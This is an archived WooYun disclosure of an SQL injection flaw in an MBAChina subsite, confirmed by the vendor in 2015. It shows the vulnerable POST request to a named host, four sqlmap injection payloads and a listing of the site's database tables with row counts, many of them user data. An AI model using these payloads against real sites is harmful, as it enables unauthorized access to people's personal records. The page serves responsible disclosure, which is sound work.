MBAChina某站存在SQL注入漏洞 | wooyun-2015-0154839| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154839

漏洞标题：MBAChina某站存在SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-11-23 13:37

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-23：细节已通知厂商并且等待厂商处理中
2015-11-27：厂商已经确认，细节仅向厂商公开
2015-12-07：细节向核心白帽子及相关领域专家公开
2015-12-17：细节向普通白帽子公开
2015-12-27：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

详细说明：

POST /ajax/school HTTP/1.1
Content-Length: 291
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=c4652c59b4fb121a55ebbbd180ee82e8; Hm_lvt_f32f93fde409792bf8eb50545077d14d=1447949240,1447949240,1447949253,1447949253; Hm_lpvt_f32f93fde409792bf8eb50545077d14d=1447949253; CNZZDATA1408427=cnzz_eid%3D1443630501-1447947757-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447947757; HMACCOUNT=AA0A86F87DACB9AE
Host: smba.mbachina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
area=11

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: area (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: area=(SELECT (CASE WHEN (8730=8730) THEN 8730 ELSE 8730*(SELECT 8730 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: area=11 AND (SELECT 2320 FROM(SELECT COUNT(*),CONCAT(0x717a767171,(SELECT (ELT(2320=2320,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: area=11 AND (SELECT * FROM (SELECT(SLEEP(5)))gELp)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: area=11 UNION ALL SELECT CONCAT(0x717a767171,0x50686c66535a6f584870,0x716a766a71),NULL-- 
---
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: yuanxiaoku
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| bmgl_user_school                | 295790  |
| bmgl_user_basic                 | 75045   |
| bmgl_user_detail                | 74830   |
| mba_sendmail_log                | 63868   |
| bmgl_develop_info               | 62120   |
| mba_user_info                   | 48207   |
| bmgl_user_info                  | 40634   |
| mba_user_edu                    | 25981   |
| mba_sms_log                     | 24390   |
| mba_user_work                   | 21608   |
| mba_fair_user_school            | 13015   |
| zw_school_comment               | 10767   |
| mba_activity_user               | 10718   |
| mba_sms_code                    | 8597    |
| bmgl_user_affix                 | 4073    |
| mba_fair_user_info              | 3886    |
| mba_fair_user_basic             | 3881    |
| mba_fair_user_schoolrooms       | 3702    |
| bmgl_otherdegree_info           | 3605    |
| mba_fair_user_edu               | 2880    |
| bmgl_eduexperience_info         | 1613    |
| mba_fair_user_work              | 1525    |
| bmgl_beforejob_info             | 1497    |
| zw_school_hisstudent            | 1497    |
| zw_school_historyscore          | 1483    |
| mba_activity                    | 1441    |
| mba_access                      | 1357    |
| mba_meeting_room                | 1224    |
| bmgl_team_school                | 1094    |
| mba_meeting_user                | 601     |
| mba_wenda                       | 594     |
| bmgl_school_info                | 493     |
| mba_wenda_admin                 | 464     |
| mba_meeting_base                | 442     |
| mba_fair_user_question          | 296     |
| zw_school_info                  | 272     |
| mba_showrooms_school_commonques | 271     |
| mba_node                        | 263     |
| mba_feedback                    | 252     |
| mba_tiezi                       | 241     |
| mba_showrooms_school_alumni     | 237     |
| mba_colleage_remarks            | 195     |
| mba_showrooms_school_campus     | 166     |
| zw_teacher_info                 | 162     |
| mba_showrooms_school_teacher    | 147     |
| bmgl_item_field                 | 135     |
| mba_menu                        | 124     |
| mba_showrooms_school_loop       | 106     |
| mba_message_user                | 104     |
| mba_showrooms_school            | 92      |
| mba_mydir_user                  | 84      |
| mba_showrooms_school_item       | 72      |
| mba_role_user                   | 63      |
| mba_admin                       | 59      |
| mba_showrooms_school_admin      | 58      |
| bmgl_apply_field                | 54      |
| zt_apply_user                   | 48      |
| mba_college_user                | 42      |
| mba_college_app                 | 41      |
| mba_showrooms_school_base       | 34      |
| zw_user_info                    | 27      |
| mba_ad                          | 25      |
| bmgl_item_folder                | 22      |
| mba_category                    | 22      |
| mba_role                        | 17      |
| bmgl_item_info                  | 16      |
| zw_student_info                 | 14      |
| zw_enschool_info                | 12      |
| bm_student_condition            | 10      |
| mba_showrooms                   | 10      |
| zt_apply_progress               | 10      |
| zw_advert_info                  | 9       |
| mba_user_bm                     | 8       |
| bm_house_item                   | 6       |
| bm_house_batch                  | 5       |
| bm_houseschool_info             | 5       |
| zw_teacher_openclass            | 5       |
| bm_house_agent                  | 4       |
| bm_house_train                  | 3       |
| bmgl_gain_info                  | 3       |
| bmgl_sms_code                   | 3       |
| bmgl_sms_log                    | 3       |
| bm_student_apply                | 2       |
| mba_message                     | 2       |
| bmgl_blame_info                 | 1       |
| bmgl_credit_info                | 1       |
| bmgl_englistscore_info          | 1       |
| bmgl_otherenglish_info          | 1       |
| zt_apply_info                   | 1       |
+---------------------------------+---------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-11-27 15:07

厂商回复：

非常感谢您，问题已着手处理，感谢您对我们安全工作的关注。欢迎反馈，我们会有专人跟进处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154839

漏洞标题：MBAChina某站存在SQL注入漏洞

相关厂商：MBAChina

漏洞作者：路人甲

提交时间：2015-11-23 13:37

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154839

漏洞标题：MBAChina某站存在SQL注入漏洞

相关厂商：MBAChina

漏洞作者： 路人甲

提交时间：2015-11-23 13:37

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154839"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云